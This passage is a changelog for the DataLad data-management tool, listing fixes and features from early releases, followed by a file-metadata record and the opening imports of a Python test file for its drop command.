https://github.com/datalad/datalad-neuroimaging\n\n- Crawler\n\n - moved into a dedicated extension:\n https://github.com/datalad/datalad-crawler\n\n- ``export_tarball`` plugin has been generalized to ``export_archive``\n and can now also generate ZIP archives.\n- By default a dataset X is now only considered to be a super-dataset\n of another dataset Y, if Y is also a registered subdataset of X.\n\n.. _fixes-38:\n\nFixes\n-----\n\nA number of fixes did not make it into the 0.9.x series:\n\n- Dynamic configuration overrides via the ``-c`` option were not in\n effect.\n- ``save`` is now more robust with respect to invocation in\n subdirectories of a dataset.\n- ``unlock`` now reports correct paths when running in a dataset\n subdirectory.\n- ``get`` is more robust to path that contain symbolic links.\n- symlinks to subdatasets of a dataset are now correctly treated as a\n symlink, and not as a subdataset\n- ``add`` now correctly saves staged subdataset additions.\n- Running ``datalad save`` in a dataset no longer adds untracked\n content to the dataset. In order to add content a path has to be\n given, e.g. ``datalad save .``\n- ``wtf`` now works reliably with a DataLad that wasn’t installed from\n Git (but, e.g., via pip)\n- More robust URL handling in ``simple_with_archives`` crawler\n pipeline.\n\n.. _enhancements-and-new-features-37:\n\nEnhancements and new features\n-----------------------------\n\n- Support for DataLad extension that can contribute API components from\n 3rd-party sources, incl. commands, metadata extractors, and test case\n implementations. See\n https://github.com/datalad/datalad-extension-template for a demo\n extension.\n- Metadata (everything has changed!)\n\n - Metadata extraction and aggregation is now supported for datasets\n and individual files.\n - Metadata query via ``search`` can now discover individual files.\n - Extracted metadata can now be stored in XZ compressed files, is\n optionally annexed (when exceeding a configurable size threshold),\n and obtained on demand (new configuration option\n ``datalad.metadata.create-aggregate-annex-limit``).\n - Status and availability of aggregated metadata can now be reported\n via ``metadata --get-aggregates``\n - New configuration option ``datalad.metadata.maxfieldsize`` to\n exclude too large metadata fields from aggregation.\n - The type of metadata is no longer guessed during metadata\n extraction. A new configuration option\n ``datalad.metadata.nativetype`` was introduced to enable one or\n more particular metadata extractors for a dataset.\n - New configuration option\n ``datalad.metadata.store-aggregate-content`` to enable the storage\n of aggregated metadata for dataset content (i.e. file-based\n metadata) in contrast to just metadata describing a dataset as a\n whole.\n\n- ``search`` was completely reimplemented. It offers three different\n modes now:\n\n - ‘egrep’ (default): expression matching in a plain string version\n of metadata\n - ‘textblob’: search a text version of all metadata using a fully\n featured query language (fast indexing, good for keyword search)\n - ‘autofield’: search an auto-generated index that preserves\n individual fields of metadata that can be represented in a tabular\n structure (substantial indexing cost, enables the most detailed\n queries of all modes)\n\n- New extensions:\n\n - `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__,\n an extension for creating a dataset (and possibly subdatasets)\n from a list of URLs.\n - export_to_figshare\n - extract_metadata\n\n- add_readme makes use of available metadata\n- By default the wtf extension now hides sensitive information, which\n can be included in the output by passing ``--senstive=some`` or\n ``--senstive=all``.\n- Reduced startup latency by only importing commands necessary for a\n particular command line call.\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__:\n\n - ``-d <parent> --nosave`` now registers subdatasets, when possible.\n - ``--fake-dates`` configures dataset to use fake-dates\n\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n now provides a way for the caller to save the result when a command\n has a non-zero exit status.\n- ``datalad rerun`` now has a ``--script`` option that can be used to\n extract previous commands into a file.\n- A DataLad Singularity container is now available on `Singularity\n Hub <https://singularity-hub.org/collections/667>`__.\n- More casts have been embedded in the `use case section of the\n documentation <http://docs.datalad.org/en/docs/usecases/index.html>`__.\n- ``datalad --report-status`` has a new value ‘all’ that can be used to\n temporarily re-enable reporting that was disable by configuration\n settings.\n\n0.9.3 (Mar 16, 2018) – pi+0.02 release\n======================================\n\nSome important bug fixes which should improve usability\n\n.. _fixes-39:\n\nFixes\n-----\n\n- ``datalad-archives`` special remote now will lock on acquiring or\n extracting an archive - this allows for it to be used with -J flag\n for parallel operation\n- relax introduced in 0.9.2 demand on git being configured for datalad\n operation - now we will just issue a warning\n- ``datalad ls`` should now list “authored date” and work also for\n datasets in detached HEAD mode\n- ``datalad save`` will now save original file as well, if file was\n “git mv”ed, so you can now ``datalad run git mv old new`` and have\n changes recorded\n\n.. _enhancements-and-new-features-38:\n\nEnhancements and new features\n-----------------------------\n\n- ``--jobs`` argument now could take ``auto`` value which would decide\n on # of jobs depending on the # of available CPUs. ``git-annex`` >\n 6.20180314 is recommended to avoid regression with -J.\n- memoize calls to ``RI`` meta-constructor – should speed up operation\n a bit\n- ``DATALAD_SEED`` environment variable could be used to seed Python\n RNG and provide reproducible UUIDs etc (useful for testing and demos)\n\n0.9.2 (Mar 04, 2018) – it is (again) better than ever\n=====================================================\n\nLargely a bugfix release with a few enhancements.\n\n.. _fixes-40:\n\nFixes\n-----\n\n- Execution of external commands (git) should not get stuck when lots\n of both stdout and stderr output, and should not loose remaining\n output in some cases\n- Config overrides provided in the command line (-c) should now be\n handled correctly\n- Consider more remotes (not just tracking one, which might be none)\n while installing subdatasets\n- Compatibility with git 2.16 with some changed behaviors/annotations\n for submodules\n- Fail ``remove`` if ``annex drop`` failed\n- Do not fail operating on files which start with dash (-)\n- URL unquote paths within S3, URLs and DataLad RIs (///)\n- In non-interactive mode fail if authentication/access fails\n- Web UI:\n\n - refactored a little to fix incorrect listing of submodules in\n subdirectories\n - now auto-focuses on search edit box upon entering the page\n\n- Assure that extracted from tarballs directories have executable bit\n set\n\n.. _enhancements-and-new-features-39:\n\nEnhancements and new features\n-----------------------------\n\n- A log message and progress bar will now inform if a tarball to be\n downloaded while getting specific files (requires git-annex >\n 6.20180206)\n- A dedicated ``datalad rerun`` command capable of rerunning entire\n sequences of previously ``run`` commands. **Reproducibility through\n VCS. Use ``run`` even if not interested in ``rerun``**\n- Alert the user if ``git`` is not yet configured but git operations\n are requested\n- Delay collection of previous ssh connections until it is actually\n needed. Also do not require ‘:’ while specifying ssh host\n- AutomagicIO: Added proxying of isfile, lzma.LZMAFile and io.open\n- Testing:\n\n - added DATALAD_DATASETS_TOPURL=http://datasets-tests.datalad.org to\n run tests against another website to not obscure access stats\n - tests run against temporary HOME to avoid side-effects\n - better unit-testing of interactions with special remotes\n\n- CONTRIBUTING.md describes how to setup and use ``git-hub`` tool to\n “attach” commits to an issue making it into a PR\n- DATALAD_USE_DEFAULT_GIT env variable could be used to cause DataLad\n to use default (not the one possibly bundled with git-annex) git\n- Be more robust while handling not supported requests by annex in\n special remotes\n- Use of ``swallow_logs`` in the code was refactored away – less\n mysteries now, just increase logging level\n- ``wtf`` plugin will report more information about environment,\n externals and the system\n\n0.9.1 (Oct 01, 2017) – “DATALAD!”(JBTM)\n=======================================\n\nMinor bugfix release\n\n.. _fixes-41:\n\nFixes\n-----\n\n- Should work correctly with subdatasets named as numbers of bool\n values (requires also GitPython >= 2.1.6)\n- Custom special remotes should work without crashing with git-annex >=\n 6.20170924\n\n0.9.0 (Sep 19, 2017) – isn’t it a lucky day even though not a Friday?\n=====================================================================\n\n.. _major-refactoring-and-deprecations-13:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- the ``files`` argument of\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n has been renamed to ``path`` to be uniform with any other command\n- all major commands now implement more uniform API semantics and\n result reporting. Functionality for modification detection of dataset\n content has been completely replaced with a more efficient\n implementation\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n now features a ``--transfer-data`` switch that allows for a\n disambiguous specification of whether to publish data – independent\n of the selection which datasets to publish (which is done via their\n paths). Moreover,\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n now transfers data before repository content is pushed.\n\n.. _fixes-42:\n\nFixes\n-----\n\n- `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n no longer errors when some subdatasets are not installed\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n will no longer report nothing when a Dataset instance was given as a\n source argument, but rather perform as expected\n- `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n doesn’t remove when some files of a dataset could not be dropped\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n\n - no longer hides error during a repository push\n - publish behaves “correctly” for ``--since=`` in considering only\n the differences the last “pushed” state\n - data transfer handling while publishing with dependencies, to\n github\n\n- improved robustness with broken Git configuration\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n should search for unicode strings correctly and not crash\n- robustify git-annex special remotes protocol handling to allow for\n spaces in the last argument\n- UI credentials interface should now allow to Ctrl-C the entry\n- should not fail while operating on submodules named with numerics\n only or by bool (true/false) names\n- crawl templates should not now override settings for ``largefiles``\n if specified in ``.gitattributes``\n\n.. _enhancements-and-new-features-40:\n\nEnhancements and new features\n-----------------------------\n\n- **Exciting new feature**\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n command to protocol execution of an external command and rerun\n computation if desired. See\n `screencast <http://datalad.org/features.html#reproducible-science>`__\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n now uses Git for detecting with sundatasets need to be inspected for\n potential changes, instead of performing a complete traversal of a\n dataset tree\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n looks for changes relative to the last committed state of a dataset\n to discover files to add more efficiently\n- `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n can now report untracked files in addition to modified files\n- [uninstall][] will check itself whether a subdataset is properly\n registered in a superdataset, even when no superdataset is given in a\n call\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n can now configure subdatasets for exclusion from recursive\n installation (``datalad-recursiveinstall`` submodule configuration\n property)\n- precrafted pipelines of [crawl][] now will not override\n ``annex.largefiles`` setting if any was set within ``.gitattribues``\n (e.g. by ``datalad create --text-no-annex``)\n- framework for screencasts: ``tools/cast*`` tools and sample cast\n scripts under ``doc/casts`` which are published at\n `datalad.org/features.html <http://datalad.org/features.html>`__\n- new `project YouTube\n channel <https://www.youtube.com/channel/UCB8-Zf7D0DSzAsREoIt0Bvw>`__\n- tests failing in direct and/or v6 modes marked explicitly\n\n0.8.1 (Aug 13, 2017) – the best birthday gift\n=============================================\n\nBugfixes\n\n.. _fixes-43:\n\nFixes\n-----\n\n- Do not attempt to\n `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n a not installed sub-dataset\n- In case of too many files to be specified for\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n or\n `copy_to <http://docs.datalad.org/en/latest/_modules/datalad/support/annexrepo.html?highlight=%22copy_to%22>`__,\n we will make multiple invocations of underlying git-annex command to\n not overfill command line\n- More robust handling of unicode output in terminals which might not\n support it\n\n.. _enhancements-and-new-features-41:\n\nEnhancements and new features\n-----------------------------\n\n- Ship a copy of numpy.testing to facilitate [test][] without requiring\n numpy as dependency. Also allow to pass to command which test(s) to\n run\n- In\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n and\n `copy_to <http://docs.datalad.org/en/latest/_modules/datalad/support/annexrepo.html?highlight=%22copy_to%22>`__\n provide actual original requested paths, not the ones we deduced need\n to be transferred, solely for knowing the total\n\n0.8.0 (Jul 31, 2017) – it is better than ever\n=============================================\n\nA variety of fixes and enhancements\n\n.. _fixes-44:\n\nFixes\n-----\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n would now push merged ``git-annex`` branch even if no other changes\n were done\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n should be able to publish using relative path within SSH URI (git\n hook would use relative paths)\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n should better tollerate publishing to pure git and ``git-annex``\n special remotes\n\n.. _enhancements-and-new-features-42:\n\nEnhancements and new features\n-----------------------------\n\n- `plugin <http://datalad.readthedocs.io/en/latest/generated/man/datalad-plugin.html>`__\n mechanism came to replace\n `export <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html>`__.\n See\n `export_tarball <http://docs.datalad.org/en/latest/generated/datalad.plugin.export_tarball.html>`__\n for the replacement of\n `export <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html>`__.\n Now it should be easy to extend datalad’s interface with custom\n functionality to be invoked along with other commands.\n- Minimalistic coloring of the results rendering\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__/``copy_to``\n got progress bar report now and support of ``--jobs``\n- minor fixes and enhancements to crawler (e.g. support of recursive\n removes)\n\n0.7.0 (Jun 25, 2017) – when it works - it is quite awesome!\n===========================================================\n\nNew features, refactorings, and bug fixes.\n\n.. _major-refactoring-and-deprecations-14:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- `add-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add-sibling.html>`__\n has been fully replaced by the\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n command\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__,\n and\n `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n have been re-written to support the same common API as most other\n commands\n\n.. _enhancements-and-new-features-43:\n\nEnhancements and new features\n-----------------------------\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n can now be used to query and configure a local repository by using\n the sibling name ``here``\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n can now query and set annex preferred content configuration. This\n includes ``wanted`` (as previously supported in other commands), and\n now also ``required``\n- New\n `metadata <http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html>`__\n command to interface with datasets/files\n `meta-data <http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling>`__\n- Documentation for all commands is now built in a uniform fashion\n- Significant parts of the documentation of been updated\n- Instantiate GitPython’s Repo instances lazily\n\n.. _fixes-45:\n\nFixes\n-----\n\n- API documentation is now rendered properly as HTML, and is easier to\n browse by having more compact pages\n- Closed files left open on various occasions (Popen PIPEs, etc)\n- Restored basic (consumer mode of operation) compatibility with\n Windows OS\n\n0.6.0 (Jun 14, 2017) – German perfectionism\n===========================================\n\nThis release includes a **huge** refactoring to make code base and\nfunctionality more robust and flexible\n\n- outputs from API commands could now be highly customized. See\n ``--output-format``, ``--report-status``, ``--report-type``, and\n ``--report-type`` options for\n `datalad <http://docs.datalad.org/en/latest/generated/man/datalad.html>`__\n command.\n- effort was made to refactor code base so that underlying functions\n behave as generators where possible\n- input paths/arguments analysis was redone for majority of the\n commands to provide unified behavior\n\n.. _major-refactoring-and-deprecations-15:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- ``add-sibling`` and ``rewrite-urls`` were refactored in favor of new\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n command which should be used for siblings manipulations\n- ‘datalad.api.alwaysrender’ config setting/support is removed in favor\n of new outputs processing\n\n.. _fixes-46:\n\nFixes\n-----\n\n- Do not flush manually git index in pre-commit to avoid “Death by the\n Lock” issue\n- Deployed by\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n ``post-update`` hook script now should be more robust (tolerate\n directory names with spaces, etc.)\n- A variety of fixes, see `list of pull requests and issues\n closed <https://github.com/datalad/datalad/milestone/41?closed=1>`__\n for more information\n\n.. _enhancements-and-new-features-44:\n\nEnhancements and new features\n-----------------------------\n\n- new\n `annotate-paths <http://docs.datalad.org/en/latest/generated/man/datalad-annotate-paths.html>`__\n plumbing command to inspect and annotate provided paths. Use\n ``--modified`` to summarize changes between different points in the\n history\n- new\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n plumbing command to provide a subset (install a single dataset from a\n URL) functionality of\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n- new\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n plumbing command\n- new\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n command to list or manipulate siblings\n- new\n `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n command to list subdatasets and their properties\n- `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n and\n `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n commands were refactored\n- ``benchmarks/`` collection of `Airspeed\n velocity <https://github.com/spacetelescope/asv/>`__ benchmarks\n initiated. See reports at http://datalad.github.io/datalad/\n- crawler would try to download a new url multiple times increasing\n delay between attempts. Helps to resolve problems with extended\n crawls of Amazon S3\n- `CRCNS <http://crcns.org>`__ crawler pipeline now also fetches and\n aggregates meta-data for the datasets from datacite\n- overall optimisations to benefit from the aforementioned refactoring\n and improve user-experience\n- a few stub and not (yet) implemented commands (e.g. ``move``) were\n removed from the interface\n- Web frontend got proper coloring for the breadcrumbs and some\n additional caching to speed up interactions. See\n http://datasets.datalad.org\n- Small improvements to the online documentation. See e.g. `summary of\n differences between\n git/git-annex/datalad <http://docs.datalad.org/en/latest/related.html#git-git-annex-datalad>`__\n\n0.5.1 (Mar 25, 2017) – cannot stop the progress\n===============================================\n\nA bugfix release\n\n.. _fixes-47:\n\nFixes\n-----\n\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n was forcing addition of files to annex regardless of settings in\n ``.gitattributes``. Now that decision is left to annex by default\n- ``tools/testing/run_doc_examples`` used to run doc examples as tests,\n fixed up to provide status per each example and not fail at once\n- ``doc/examples``\n\n - `3rdparty_analysis_workflow.sh <http://docs.datalad.org/en/latest/generated/examples/3rdparty_analysis_workflow.html>`__\n was fixed up to reflect changes in the API of 0.5.0.\n\n- progress bars\n\n - should no longer crash **datalad** and report correct sizes and\n speeds\n - should provide progress reports while using Python 3.x\n\n.. _enhancements-and-new-features-45:\n\nEnhancements and new features\n-----------------------------\n\n- ``doc/examples``\n\n - `nipype_workshop_dataset.sh <http://docs.datalad.org/en/latest/generated/examples/nipype_workshop_dataset.html>`__\n new example to demonstrate how new super- and sub- datasets were\n established as a part of our datasets collection\n\n0.5.0 (Mar 20, 2017) – it’s huge\n================================\n\nThis release includes an avalanche of bug fixes, enhancements, and\nadditions which at large should stay consistent with previous behavior\nbut provide better functioning. Lots of code was refactored to provide\nmore consistent code-base, and some API breakage has happened. Further\nwork is ongoing to standardize output and results reporting\n(`#1350 <https://github.com/datalad/datalad/issues/1350>`__)\n\nMost notable changes\n--------------------\n\n- requires `git-annex <http://git-annex.branchable.com/>`__ >=\n 6.20161210 (or better even >= 6.20161210 for improved functionality)\n- commands should now operate on paths specified (if any), without\n causing side-effects on other dirty/staged files\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n\n - ``-a`` is deprecated in favor of ``-u`` or ``--all-updates`` so\n only changes known components get saved, and no new files\n automagically added\n - ``-S`` does no longer store the originating dataset in its commit\n message\n\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n\n - can specify commit/save message with ``-m``\n\n- `add-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add-sibling.html>`__\n and\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n\n - now take the name of the sibling (remote) as a ``-s`` (``--name``)\n option, not a positional argument\n - ``--publish-depends`` to setup publishing data and code to\n multiple repositories (e.g. github + webserve) should now be\n functional see `this\n comment <https://github.com/datalad/datalad/issues/335#issuecomment-277240733>`__\n - got ``--publish-by-default`` to specify what refs should be\n published by default\n - got ``--annex-wanted``, ``--annex-groupwanted`` and\n ``--annex-group`` settings which would be used to instruct annex\n about preferred content.\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n then will publish data using those settings if ``wanted`` is set.\n - got ``--inherit`` option to automagically figure out url/wanted\n and other git/annex settings for new remote sub-dataset to be\n constructed\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n\n - got ``--skip-failing`` refactored into ``--missing`` option which\n could use new feature of\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n ``--inherit``\n\n.. _fixes-48:\n\nFixes\n-----\n\n- More consistent interaction through ssh - all ssh connections go\n through\n `sshrun <http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html>`__\n shim for a “single point of authentication”, etc.\n- More robust\n `ls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-ls.html>`__\n operation outside of the datasets\n- A number of fixes for direct and v6 mode of annex\n\n.. _enhancements-and-new-features-46:\n\nEnhancements and new features\n-----------------------------\n\n- New\n `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n and\n `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n commands\n- `clean <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clean.html>`__\n\n - got ``--what`` to specify explicitly what cleaning steps to\n perform and now could be invoked with ``-r``\n\n- ``datalad`` and ``git-annex-remote*`` scripts now do not use\n setuptools entry points mechanism and rely on simple import to\n shorten start up time\n- `Dataset <http://docs.datalad.org/en/latest/generated/datalad.api.Dataset.html>`__\n is also now using `Flyweight\n pattern <https://en.wikipedia.org/wiki/Flyweight_pattern>`__, so the\n same instance is reused for the same dataset\n- progressbars should not add more empty lines\n\nInternal refactoring\n--------------------\n\n- Majority of the commands now go through ``_prep`` for arguments\n validation and pre-processing to avoid recursive invocations\n\n0.4.1 (Nov 10, 2016) – CA release\n=================================\n\nRequires now GitPython >= 2.1.0\n\n.. _fixes-49:\n\nFixes\n-----\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n\n - to not save staged files if explicit paths were provided\n\n- improved (but not yet complete) support for direct mode\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n to not crash if some sub-datasets are not installed\n- do not log calls to ``git config`` to avoid leakage of possibly\n sensitive settings to the logs\n\n.. _enhancements-and-new-features-47:\n\nEnhancements and new features\n-----------------------------\n\n- New `rfc822-compliant\n metadata <http://docs.datalad.org/en/latest/metadata.html#rfc822-compliant-meta-data>`__\n format\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n\n - -S to save the change also within all super-datasets\n\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n now has progress-bar reporting\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n to create a :term:``sibling`` of a dataset on github\n- `OpenfMRI <http://openfmri.org>`__ crawler and datasets were enriched\n with URLs to separate files where also available from openfmri s3\n bucket (if upgrading your datalad datasets, you might need to run\n ``git annex enableremote datalad`` to make them available)\n- various enhancements to log messages\n- web interface\n\n - populates “install” box first thus making UX better over slower\n connections\n\n0.4 (Oct 22, 2016) – Paris is waiting\n=====================================\n\nPrimarily it is a bugfix release but because of significant refactoring\nof the\n`install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\nand\n`get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\nimplementation, it gets a new minor release.\n\n.. _fixes-50:\n\nFixes\n-----\n\n- be able to\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n or\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n while providing paths while being outside of a dataset\n- remote annex datasets get properly initialized\n- robust detection of outdated\n `git-annex <http://git-annex.branchable.com/>`__\n\n.. _enhancements-and-new-features-48:\n\nEnhancements and new features\n-----------------------------\n\n- interface changes\n\n - `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n ``--recursion-limit=existing`` to not recurse into not-installed\n subdatasets\n - `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n ``-n`` to possibly install sub-datasets without getting any data\n - `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n ``--jobs|-J`` to specify number of parallel jobs for annex\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n call could use (ATM would not work when data comes from archives)\n\n- more (unit-)testing\n- documentation: see http://docs.datalad.org/en/latest/basics.html for\n basic principles and useful shortcuts in referring to datasets\n- various webface improvements: breadcrumb paths, instructions how to\n install dataset, show version from the tags, etc.\n\n0.3.1 (Oct 1, 2016) – what a wonderful week\n===========================================\n\nPrimarily bugfixes but also a number of enhancements and core\nrefactorings\n\n.. _fixes-51:\n\nFixes\n-----\n\n- do not build manpages and examples during installation to avoid\n problems with possibly previously outdated dependencies\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n can be called on already installed dataset (with ``-r`` or ``-g``)\n\n.. _enhancements-and-new-features-49:\n\nEnhancements and new features\n-----------------------------\n\n- complete overhaul of datalad configuration settings handling (see\n `Configuration\n documentation <http://docs.datalad.org/config.html>`__), so majority\n of the environment. Now uses git format and stores persistent\n configuration settings under ``.datalad/config`` and local within\n ``.git/config`` variables we have used were renamed to match\n configuration names\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n does not now by default upload web front-end\n- `export <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html>`__\n command with a plug-in interface and ``tarball`` plugin to export\n datasets\n- in Python, ``.api`` functions with rendering of results in command\n line got a \\_-suffixed sibling, which would render results as well in\n Python as well (e.g., using ``search_`` instead of ``search`` would\n also render results, not only output them back as Python objects)\n- `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n\n - ``--jobs`` option (passed to ``annex get``) for parallel downloads\n - total and per-download (with git-annex >= 6.20160923) progress\n bars (note that if content is to be obtained from an archive, no\n progress will be reported yet)\n\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n ``--reckless`` mode option\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n\n - highlights locations and fieldmaps for better readability\n - supports ``-d^`` or ``-d///`` to point to top-most or centrally\n installed meta-datasets\n - “complete” paths to the datasets are reported now\n - ``-s`` option to specify which fields (only) to search\n\n- various enhancements and small fixes to\n `meta-data <http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling>`__\n handling,\n `ls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-ls.html>`__,\n custom remotes, code-base formatting, downloaders, etc\n- completely switched to ``tqdm`` library (``progressbar`` is no longer\n used/supported)\n\n0.3 (Sep 23, 2016) – winter is coming\n=====================================\n\nLots of everything, including but not limited to\n\n- enhanced index viewer, as the one on http://datasets.datalad.org\n- initial new data providers support:\n `Kaggle <https://www.kaggle.com>`__,\n `BALSA <http://balsa.wustl.edu>`__,\n `NDA <http://data-archive.nimh.nih.gov>`__,\n `NITRC <https://www.nitrc.org>`__\n- initial `meta-data support and\n management <http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling>`__\n- new and/or improved crawler pipelines for\n `BALSA <http://balsa.wustl.edu>`__, `CRCNS <http://crcns.org>`__,\n `OpenfMRI <http://openfmri.org>`__\n- refactored\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n command, now with separate\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n- some other commands renaming/refactoring (e.g.,\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__)\n- datalad\n `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n would give you an option to install datalad’s super-dataset under\n ~/datalad if ran outside of a dataset\n\n0.2.3 (Jun 28, 2016) – busy OHBM\n--------------------------------\n\nNew features and bugfix release\n\n- support of /// urls to point to http://datasets.datalad.org\n- variety of fixes and enhancements throughout\n\n0.2.2 (Jun 20, 2016) – OHBM we are coming!\n------------------------------------------\n\nNew feature and bugfix release\n\n- greately improved documentation\n- publish command API RFing allows for custom options to annex, and\n uses –to REMOTE for consistent with annex invocation\n- variety of fixes and enhancements throughout\n\n0.2.1 (Jun 10, 2016)\n--------------------\n\n- variety of fixes and enhancements throughout\n\n0.2 (May 20, 2016)\n==================\n\nMajor RFing to switch from relying on rdf to git native submodules etc\n\n0.1 (Oct 14, 2015)\n==================\n\nRelease primarily focusing on interface functionality including initial\npublishing\n" }, { "alpha_fraction": 0.6377370357513428, "alphanum_fraction": 0.641990065574646, "avg_line_length": 34.60252380371094, "blob_id": "a8e7da34d8a270e83c9b88060a3438daf24c4ab9", "content_id": "8f6d0254b27d25859a109f678dd8d4e4e5f146c5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22572, "license_type": "permissive", "max_line_length": 95, "num_lines": 634, "path": "/datalad/distributed/tests/test_drop.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test drop command\"\"\"\n\nimport os\nimport os.path as op\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nfrom datalad.api import (\n Dataset,\n clone,\n create,\n drop,\n)\nfrom datalad.distributed.drop import (\n _detect_nondead_annex_at_remotes,\n _detect_unpushed_revs,\n)\nfrom datalad.support.exceptions import (\n IncompleteResultsError,\n NoDatasetFound,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n 